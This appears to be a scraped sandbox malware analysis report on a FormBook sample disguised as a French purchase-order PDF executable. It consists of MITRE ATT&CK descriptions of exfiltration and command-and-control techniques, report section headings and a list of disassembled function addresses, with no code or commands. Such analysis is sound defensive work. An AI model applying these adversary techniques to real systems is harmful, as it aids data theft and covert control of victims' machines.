Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Nouveau bon de commande. 3007021_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 0041817B, Relevance: 1.6, APIs: 1, Instructions: 60
filenativeCOMMON

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0041839C, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 18
nativeCOMMON

Function 004088B0, Relevance: .1, Instructions: 92
COMMON

Function 00418502, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Function 00418456, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00408C60, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Function 0041BB8C, Relevance: .6, Instructions: 582
COMMONCrypto

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Function 0041B6EB, Relevance: .2, Instructions: 189
COMMONCrypto

Function 0041CBB7, Relevance: .2, Instructions: 172
COMMONCrypto

Function 00402D88, Relevance: .2, Instructions: 165
COMMONCrypto

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Function 004012FB, Relevance: .2, Instructions: 156
COMMONCrypto

Function 00401030, Relevance: .1, Instructions: 108
COMMONCrypto

Function 004162C4, Relevance: .0, Instructions: 12
COMMON